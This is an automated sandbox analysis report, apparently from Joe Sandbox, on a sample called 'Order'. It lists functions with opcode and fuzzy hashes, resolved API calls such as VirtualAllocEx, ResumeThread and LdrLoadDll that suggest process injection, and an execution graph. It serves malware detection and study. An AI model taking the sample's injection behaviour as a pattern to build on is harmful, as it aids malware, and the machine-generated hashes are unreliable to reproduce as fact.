                                                                • API String ID: 3793708945-0
                                                                • Opcode ID: ad63b7e8a8f78fce5306982ca23037bfec138f0fb06c327b639c221d7fb283a3
                                                                • Instruction ID: 3e93e03c3e3f3595ac4ea1a8fdb1a09011b66b528a6b4909b471448fc5b41a53
                                                                • Opcode Fuzzy Hash: ad63b7e8a8f78fce5306982ca23037bfec138f0fb06c327b639c221d7fb283a3
                                                                • Instruction Fuzzy Hash: 8F21E4B5D002599FDB10CFAAD985ADEBBF4EB48320F14801AE918A3350D775A944CFA4
                                                                Function 06D0D668 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06D0D6DE
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1423690424.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6d00000_Order.jbxd
                                                                Similarity
                                                                • API ID: AllocVirtual
                                                                • String ID:
                                                                • API String ID: 4275171209-0
                                                                • Opcode ID: d08fba29a72120e6abee767820e50160a683767167a255c80126565dfa89a333
                                                                • Instruction ID: cd1664d8006fc1a8d0075f2cd7d57c25ecfbf208b30a797690321e9e08185b4e
                                                                • Opcode Fuzzy Hash: d08fba29a72120e6abee767820e50160a683767167a255c80126565dfa89a333
                                                                • Instruction Fuzzy Hash: ED216775C003498FDB20DFAAC840BDEBBF1EF48320F108419E569A7240CB769901CFA0
                                                                Function 06D0CC70 Relevance: 1.6, APIs: 1, Instructions: 54threadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1423690424.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6d00000_Order.jbxd
                                                                Similarity
                                                                • API ID: ResumeThread
                                                                • String ID:
                                                                • API String ID: 947044025-0
                                                                • Opcode ID: 459992675bfdd1c8403bb7a5e4f283a01311379797927de14e3acd0a7c737261
                                                                • Instruction ID: 6955389e6b81fcb3da4e0c2a0bea158e2738e8231c112603b22878bd20ae892f
                                                                • Opcode Fuzzy Hash: 459992675bfdd1c8403bb7a5e4f283a01311379797927de14e3acd0a7c737261
                                                                • Instruction Fuzzy Hash: 6E113471C003098FDB20DFAAC84579EBBF4AF88320F208429D559A7240CA796945CFA8
                                                                Function 06D0D670 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06D0D6DE
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1423690424.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6d00000_Order.jbxd
                                                                Similarity
                                                                • API ID: AllocVirtual
                                                                • String ID:
                                                                • API String ID: 4275171209-0
                                                                • Opcode ID: c324201b2c55af7b24a8e891d2fcd27aa8a139ba7601127eb6e00e6780228f5e
                                                                • Instruction ID: 9bd858999c6f87394e28ac641726dcb3bb6aecfc1f1e4a73361abbcafeac08d4
                                                                • Opcode Fuzzy Hash: c324201b2c55af7b24a8e891d2fcd27aa8a139ba7601127eb6e00e6780228f5e
                                                                • Instruction Fuzzy Hash: 99112671C003499FDB20DFAAC845BDEBBF5EF48320F14841AE529A7250CB75A940CFA4
                                                                Function 06D0CC78 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1423690424.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6d00000_Order.jbxd
                                                                Similarity
                                                                • API ID: ResumeThread
                                                                • String ID:
                                                                • API String ID: 947044025-0
                                                                • Opcode ID: 5c098b2b52e1153ceec4e36ad26adb85a84ae8c51d45b5f9ef7dc77806d1571a
                                                                • Instruction ID: a6da8a4f8d0a93a10a2151dd162cb26e8482e7dbe2032ad7a62675b14eeba064
                                                                • Opcode Fuzzy Hash: 5c098b2b52e1153ceec4e36ad26adb85a84ae8c51d45b5f9ef7dc77806d1571a
                                                                • Instruction Fuzzy Hash: D3113671D003498FDB20DFAAC84579EFBF5EF88320F248419D519A7240CB79A945CFA8
                                                                Function 00EBAFB8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 00EBB01E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1408994058.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_eb0000_Order.jbxd
                                                                Similarity
                                                                • API ID: HandleModule
                                                                • String ID:
                                                                • API String ID: 4139908857-0
                                                                • Opcode ID: 0fdef32452f45b8f0c4fb9791f9a18bbc401ccc521d2226dcddddd87e352eacc
                                                                • Instruction ID: aacafb7c148c7abcfc5603350c76b44b12520f109b3430bbfbe068df503111c6
                                                                • Opcode Fuzzy Hash: 0fdef32452f45b8f0c4fb9791f9a18bbc401ccc521d2226dcddddd87e352eacc
                                                                • Instruction Fuzzy Hash: 6F110FB5C003498FCB20DF9AC444BDFFBF4AB88324F10842AD529A7200D3B9A945CFA5
                                                                Function 06D0BDF0 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 06D0FD0D
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1423690424.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6d00000_Order.jbxd
                                                                Similarity
                                                                • API ID: MessagePost
                                                                • String ID:
                                                                • API String ID: 410705778-0
                                                                • Opcode ID: 7f2e5c5e7917457870a61ce27c4d7bf450907a679ee23412a23a3e31c1d7618e
                                                                • Instruction ID: 0eedda8a6dc0660872daf24477872942a8f39222e370b4b6735d1467e9bf14e5
                                                                • Opcode Fuzzy Hash: 7f2e5c5e7917457870a61ce27c4d7bf450907a679ee23412a23a3e31c1d7618e
                                                                • Instruction Fuzzy Hash: 8D1106B58003499FDB60DF9AD945BDEBBF8EB48310F208419E918A7340C375A944CFA5
                                                                Function 07091409 Relevance: 1.3, APIs: 1, Instructions: 50COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CloseHandle.KERNELBASE(?), ref: 07091468
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1424285196.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7090000_Order.jbxd
                                                                Similarity
                                                                • API ID: CloseHandle
                                                                • String ID:
                                                                • API String ID: 2962429428-0
                                                                • Opcode ID: cc7b757fc4cdb3abc3c8c06cded529c9dddcc0417a09daadb5a59d549f1b678f
                                                                • Instruction ID: 05478ddfbb932f3e969f050bf9eed0e31d4f9f577bed6e4509e07c6904df7255
                                                                • Opcode Fuzzy Hash: cc7b757fc4cdb3abc3c8c06cded529c9dddcc0417a09daadb5a59d549f1b678f
                                                                • Instruction Fuzzy Hash: 751155B18003098FCB20DF9AC545BDEFBF4EF48320F20842AE598A3240D738A945CFA5
                                                                Function 07091410 Relevance: 1.3, APIs: 1, Instructions: 47COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CloseHandle.KERNELBASE(?), ref: 07091468
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1424285196.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7090000_Order.jbxd
                                                                Similarity
                                                                • API ID: CloseHandle
                                                                • String ID:
                                                                • API String ID: 2962429428-0
                                                                • Opcode ID: 95874558323d12ceb00f53e6a1dd7e9e47d8d350c1da3887132e66120182d841
                                                                • Instruction ID: 1c5b0ee0916792dd22cf4531da01a35a3090b5c7fc001b3b2115013c88f9ec86
                                                                • Opcode Fuzzy Hash: 95874558323d12ceb00f53e6a1dd7e9e47d8d350c1da3887132e66120182d841
                                                                • Instruction Fuzzy Hash: 271106B59003498FDB20DF9AC545BDEBBF4EB48320F108429D558A7240D779A945CFA5
                                                                Function 00DDD3D8 Relevance: .1, Instructions: 75COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1408305149.0000000000DDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DDD000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_ddd000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f8b1e2f8690b3e231da7cfca6a045a6f0745b5495e6ba50cd5ffd359dd4ed697
                                                                • Instruction ID: 4d7c57f080da72b2d6a881c2256674ca4dad4a6621f049889e36efb34922af5b
                                                                • Opcode Fuzzy Hash: f8b1e2f8690b3e231da7cfca6a045a6f0745b5495e6ba50cd5ffd359dd4ed697
                                                                • Instruction Fuzzy Hash: 71210371604204DFDF14DF10D9C0B26BB66FB98324F24C16AE8490B356C336E85ACAB2
                                                                Function 00DDD110 Relevance: .1, Instructions: 75COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1408305149.0000000000DDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DDD000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_ddd000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6953547056c44e4544152f86079dde420052885560509e79a98cdba9891c32e5
                                                                • Instruction ID: e70f4952b0899a50a4f32df24bcbe109ad7bc10813a57c258b75e7b2932d7c25
                                                                • Opcode Fuzzy Hash: 6953547056c44e4544152f86079dde420052885560509e79a98cdba9891c32e5
                                                                • Instruction Fuzzy Hash: 1F21CF72604304DFDF15DF14D9C0B26BF66FB98324F24856AE9490A356C336D85ACAB2
                                                                Function 00DED01C Relevance: .1, Instructions: 72COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1408358017.0000000000DED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DED000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_ded000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 187b6d509f8237430f3b9968f5e3967788f0408afc4ef5d2e40c4c100f0f6197
                                                                • Instruction ID: a1f3a3c1d8f3902120d3e35a881d639da4476a4116a4874cdd994a4838d8925b
                                                                • Opcode Fuzzy Hash: 187b6d509f8237430f3b9968f5e3967788f0408afc4ef5d2e40c4c100f0f6197
                                                                • Instruction Fuzzy Hash: AE21F275604380DFDB14EF14D9C4B16BB66FB84314F28C56DE84A4B286CB36D847CA72
                                                                Function 00DED005 Relevance: .1, Instructions: 62COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1408358017.0000000000DED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DED000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_ded000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f567aab47507da0901219a4a59cbf92f1eaab61212d48f8e628f6ec10ef242d1
                                                                • Instruction ID: a05131ddeccdc153b10d55f9ab23e316664cf99e447b46d9a8bc3e6231bc18fa
                                                                • Opcode Fuzzy Hash: f567aab47507da0901219a4a59cbf92f1eaab61212d48f8e628f6ec10ef242d1
                                                                • Instruction Fuzzy Hash: D2215E755093C08FCB16DF24D994715BF72EB46314F28C5EAD8498B6A7C33A980ACB62
                                                                Function 00DDD3D3 Relevance: .1, Instructions: 56COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1408305149.0000000000DDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DDD000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_ddd000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                                • Instruction ID: f67e1fd80b73d6f39891ac7300596e6ce18e78a5b050aeb0632d26aaab1d8496
                                                                • Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                                • Instruction Fuzzy Hash: 8F11AF76504240DFCF15CF14D5C4B16BF72FB94324F28C6AAD8490B656C33AE856CBA1
                                                                Function 00DDD10B Relevance: .1, Instructions: 56COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1408305149.0000000000DDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DDD000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_ddd000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                                • Instruction ID: 170538fbcde77050ada240aa4437e4d66976d49e6f38a1171219da965849ffe1
                                                                • Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                                • Instruction Fuzzy Hash: F011AF76504240CFCF15CF14D9C4B16BF72FB94324F2885AAD8094B256C336D856CBA1
                                                                Function 00DDD759 Relevance: .0, Instructions: 45COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1408305149.0000000000DDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DDD000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_ddd000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c2146562b84249c0947826e2f1ba55c41b85f4bad923bce1db35a07089136ca0
                                                                • Instruction ID: 06bfb84c0c5a320ffad353febf723439c90b119a7d1d321e192f6e1106fc7500
                                                                • Opcode Fuzzy Hash: c2146562b84249c0947826e2f1ba55c41b85f4bad923bce1db35a07089136ca0
                                                                • Instruction Fuzzy Hash: 63012631008300BEEB204A25DCC4B66FF99DF41721F28C49BED4A0A386C379EC44CAB2
                                                                Function 00DDD758 Relevance: .0, Instructions: 36COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1408305149.0000000000DDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DDD000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_ddd000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: dfb40a36252fa4afc3ae836015bd0d3cdeedd9d7a96537717cb3f2222d777c7e
                                                                • Instruction ID: ae5a6d3c523db886e970a379de533767b747122604f3d6959f4531e0f3fb1f9b
                                                                • Opcode Fuzzy Hash: dfb40a36252fa4afc3ae836015bd0d3cdeedd9d7a96537717cb3f2222d777c7e
                                                                • Instruction Fuzzy Hash: 2FF06D71404344AEEB208A16DC84B62FFA8EF51735F18C59AED094A386C379AC44CAB1

                                                                Non-executed Functions

                                                                Function 06D0B038 Relevance: 1.6, Strings: 1, Instructions: 312COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1423690424.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6d00000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %Q1e
                                                                • API String ID: 0-542332658
                                                                • Opcode ID: 8c69108789aae9ad81e44c31be655cf01799bc2bdd445c9c2b97232e5186bc19
                                                                • Instruction ID: 5f9673ee8023ff3a4e9ffba6e9295cc3d7170f40ebc13fecc9c65e8539fcf5a3
                                                                • Opcode Fuzzy Hash: 8c69108789aae9ad81e44c31be655cf01799bc2bdd445c9c2b97232e5186bc19
                                                                • Instruction Fuzzy Hash: CBE1F974E042198FEB54DFA9C580AAEFBF2BF89304F24816AD414AB355DB31AD41CF61
                                                                Function 06D0D238 Relevance: .3, Instructions: 312COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1423690424.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6d00000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c3ebd796ad034a48ff18008aa5053fe5d0327cfa7ddfb109bb24c7d1b0d566de
                                                                • Instruction ID: 861fef929230992e31822211a553d8b131697d868e741bb2fa6f275735d5e6a4
                                                                • Opcode Fuzzy Hash: c3ebd796ad034a48ff18008aa5053fe5d0327cfa7ddfb109bb24c7d1b0d566de
                                                                • Instruction Fuzzy Hash: 9AE1E974E002198FDB54DFA9C580AAEFBF2BF89304F24815AD418AB355DB30A941CFA0
                                                                Function 06D0CE00 Relevance: .3, Instructions: 312COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1423690424.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6d00000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 88e90ecf9316e53e29cb2930e28e2e188c31962e3285bc29a57cab17a318c6b1
                                                                • Instruction ID: e8a0c7dd7c4002bb0d018bf20c49572ea049ba8f1505cb6dab2264ab5252bf7f
                                                                • Opcode Fuzzy Hash: 88e90ecf9316e53e29cb2930e28e2e188c31962e3285bc29a57cab17a318c6b1
                                                                • Instruction Fuzzy Hash: B7E1D974E002198FEB54DFA9C580AAEFBF2BF89304F248169D454AB355DB31AD41CF61
                                                                Function 06D0AC00 Relevance: .3, Instructions: 312COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1423690424.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6d00000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 49d6b83b48dd56cb81a55a037f1387975e6978d35146816e801b43192faad248
                                                                • Instruction ID: 0fe176efc0b45db94d17279a18423999e4847ee1585689d244900cef8671f6d8
                                                                • Opcode Fuzzy Hash: 49d6b83b48dd56cb81a55a037f1387975e6978d35146816e801b43192faad248
                                                                • Instruction Fuzzy Hash: 29E1D874E002198FEB54DFA9C580AAEBBF2FF89305F248169D454AB356DB31AD41CF60
                                                                Function 06D02278 Relevance: .3, Instructions: 274COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1423690424.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6d00000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f4b5402a4503ec7a9f4d868733376836dfdd812f8cb1d9e76011a0318fda2f66
                                                                • Instruction ID: f5d451b3b4f82a19ffa6fc9057baa5d2b8cc9c6561a09f50878d354dde764fef
                                                                • Opcode Fuzzy Hash: f4b5402a4503ec7a9f4d868733376836dfdd812f8cb1d9e76011a0318fda2f66
                                                                • Instruction Fuzzy Hash: 37D11635C10B5A8BCB10EFA5D854A9DF772EF95300F20C79AE1093B254EB70AAC5CB91
                                                                Function 00EBD384 Relevance: .3, Instructions: 264COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1408994058.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_eb0000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6cce2d33ae39d6f4c03d568cf818e8b3c11eb356a060cf979e2acf0ad57a5657
                                                                • Instruction ID: 9763870ad4f5ba421353fdbce83b7669868cb9863de542b95cd71b8b27be70ad
                                                                • Opcode Fuzzy Hash: 6cce2d33ae39d6f4c03d568cf818e8b3c11eb356a060cf979e2acf0ad57a5657
                                                                • Instruction Fuzzy Hash: DDA14B36E102198FCF05DFA4C8445DEB7B2FF84304B1595BAE906BB266DB71E916CB80
                                                                Function 06D02288 Relevance: .3, Instructions: 264COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1423690424.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6d00000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 99538665cb0e39441f01b327506d8d16654cf79d1f7a0f2063610af5a0094de1
                                                                • Instruction ID: 3d282a759f73989f9f5933207d9a95ab9234145134c2385b4f2c861c0d29d639
                                                                • Opcode Fuzzy Hash: 99538665cb0e39441f01b327506d8d16654cf79d1f7a0f2063610af5a0094de1
                                                                • Instruction Fuzzy Hash: D7D1E535D10B5A8ACB10EFA5D854A99F7B2EF95300F20C79AD1097B214EB70AAC5CB91
                                                                Function 06D0CDF0 Relevance: .1, Instructions: 135COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1423690424.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6d00000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a247b24e763675fff6bd58b0dbc1f44ee665596c4a342d69621ad8a3c1bab4aa
                                                                • Instruction ID: 7cf2aff2e55f057cbdddf7b281e6b86f2939b65658b6db4ad8f615864fe88a5f
                                                                • Opcode Fuzzy Hash: a247b24e763675fff6bd58b0dbc1f44ee665596c4a342d69621ad8a3c1bab4aa
                                                                • Instruction Fuzzy Hash: 03511974E102198FDB54CFA9C5806AEFBF6FF89304F2482A9D458AB355DB309941CFA1
                                                                Function 06D0D228 Relevance: .1, Instructions: 131COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1423690424.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6d00000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e51b736d39a1907b3b980264c8cff20d04a1a8c1fb19c12964d9108fb075ebe9
                                                                • Instruction ID: 1f7147c0331357fe279b9503c975e123e437838a570b72f1da93a4a18b80a660
                                                                • Opcode Fuzzy Hash: e51b736d39a1907b3b980264c8cff20d04a1a8c1fb19c12964d9108fb075ebe9
                                                                • Instruction Fuzzy Hash: 7351D974E042198FDB54CFA9C5806AEBBF3BF89204F2481AAD418AB355D7319D41CFA1

                                                                Execution Graph

                                                                Execution Coverage:1.2%
                                                                Dynamic/Decrypted Code Coverage:4.8%
                                                                Signature Coverage:8.2%
                                                                Total number of Nodes:147
                                                                Total number of Limit Nodes:14
                                                                execution_graph 94780 1a02b60 LdrInitializeThunk 94781 4249e3 94782 4249ff 94781->94782 94783 424a27 94782->94783 94784 424a3b 94782->94784 94785 42c633 NtClose 94783->94785 94791 42c633 94784->94791 94787 424a30 94785->94787 94788 424a44 94794 42e863 RtlAllocateHeap 94788->94794 94790 424a4f 94792 42c64d 94791->94792 94793 42c65e NtClose 94792->94793 94793->94788 94794->94790 94795 42f7e3 94796 42f7f3 94795->94796 94797 42f7f9 94795->94797 94800 42e823 94797->94800 94799 42f81f 94803 42c943 94800->94803 94802 42e83e 94802->94799 94804 42c95d 94803->94804 94805 42c96e RtlAllocateHeap 94804->94805 94805->94802 94922 424d73 94927 424d8c 94922->94927 94923 424e1f 94924 424dd7 94925 42e743 RtlFreeHeap 94924->94925 94926 424de7 94925->94926 94927->94923 94927->94924 94928 424e1a 94927->94928 94929 42e743 RtlFreeHeap 94928->94929 94929->94923 94930 42bc33 94931 42bc4d 94930->94931 94934 1a02df0 LdrInitializeThunk 94931->94934 94932 42bc75 94934->94932 94806 414023 94807 41403d 94806->94807 94812 417793 94807->94812 94809 41405b 94810 4140a0 94809->94810 94811 41408f PostThreadMessageW 94809->94811 94811->94810 94814 4177b7 94812->94814 94813 4177be 94813->94809 94814->94813 94815 4177f3 LdrLoadDll 94814->94815 94816 41780a 94814->94816 94815->94816 94816->94809 94817 41b2c3 94818 41b307 94817->94818 94819 42c633 NtClose 94818->94819 94820 41b328 94818->94820 94819->94820 94821 413ac3 94822 413adf 94821->94822 94825 42c8b3 94822->94825 94826 42c8cd 94825->94826 94829 1a02c70 LdrInitializeThunk 94826->94829 94827 413ae5 94829->94827 94935 41a573 94936 41a5e5 94935->94936 94937 41a58b 94935->94937 94937->94936 94939 41e4c3 94937->94939 94940 41e4e9 94939->94940 94946 41e5e9 94940->94946 94948 42f913 94940->94948 94942 41e57e 94943 41e5e0 94942->94943 94944 42bc83 LdrInitializeThunk 94942->94944 94942->94946 94943->94946 94954 4289f3 94943->94954 94944->94943 94946->94936 94947 41e69b 94947->94936 94949 42f883 94948->94949 94950 42f8e0 94949->94950 94951 42e823 RtlAllocateHeap 94949->94951 94950->94942 94952 42f8bd 94951->94952 94953 42e743 RtlFreeHeap 94952->94953 94953->94950 94955 428a58 94954->94955 94956 428a93 94955->94956 94959 418b63 94955->94959 94956->94947 94958 428a75 94958->94947 94960 418b42 94959->94960 94961 418b72 94959->94961 94962 42c9e3 ExitProcess 94960->94962 94963 418b4b 94962->94963 94963->94958 94830 401b24 94831 401b47 94830->94831 94831->94831 94834 42fcb3 94831->94834 94837 42e2b3 94834->94837 94838 42e2f6 94837->94838 94849 407283 94838->94849 94840 42e30c 94848 401bf8 94840->94848 94852 41b0d3 94840->94852 94842 42e32b 94843 42e340 94842->94843 94867 42c9e3 94842->94867 94863 428303 94843->94863 94846 42e35a 94847 42c9e3 ExitProcess 94846->94847 94847->94848 94851 407290 94849->94851 94870 4164a3 94849->94870 94851->94840 94853 41b0ff 94852->94853 94894 41afc3 94853->94894 94856 41b144 94858 41b160 94856->94858 94861 42c633 NtClose 94856->94861 94857 41b12c 94859 41b137 94857->94859 94860 42c633 NtClose 94857->94860 94858->94842 94859->94842 94860->94859 94862 41b156 94861->94862 94862->94842 94864 428365 94863->94864 94866 428372 94864->94866 94905 418613 94864->94905 94866->94846 94868 42c9fd 94867->94868 94869 42ca0e ExitProcess 94868->94869 94869->94843 94871 4164c0 94870->94871 94873 4164d9 94871->94873 94874 42d083 94871->94874 94873->94851 94876 42d09d 94874->94876 94875 42d0cc 94875->94873 94876->94875 94881 42bc83 94876->94881 94882 42bc9d 94881->94882 94888 1a02c0a 94882->94888 94883 42bcc9 94885 42e743 94883->94885 94891 42c993 94885->94891 94887 42d145 94887->94873 94889 1a02c11 94888->94889 94890 1a02c1f LdrInitializeThunk 94888->94890 94889->94883 94890->94883 94892 42c9ad 94891->94892 94893 42c9be RtlFreeHeap 94892->94893 94893->94887 94895 41b0b9 94894->94895 94896 41afdd 94894->94896 94895->94856 94895->94857 94900 42bd23 94896->94900 94899 42c633 NtClose 94899->94895 94901 42bd40 94900->94901 94904 1a035c0 LdrInitializeThunk 94901->94904 94902 41b0ad 94902->94899 94904->94902 94907 41863d 94905->94907 94906 418b4b 94906->94866 94907->94906 94913 413ca3 94907->94913 94909 41876a 94909->94906 94910 42e743 RtlFreeHeap 94909->94910 94911 418782 94910->94911 94911->94906 94912 42c9e3 ExitProcess 94911->94912 94912->94906 94915 413cc3 94913->94915 94917 413d2c 94915->94917 94918 41b3e3 RtlFreeHeap LdrInitializeThunk 94915->94918 94916 413d22 94916->94909 94917->94909 94918->94916 94919 418d68 94920 42c633 NtClose 94919->94920 94921 418d72 94920->94921

                                                                Executed Functions

                                                                Function 00417793 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
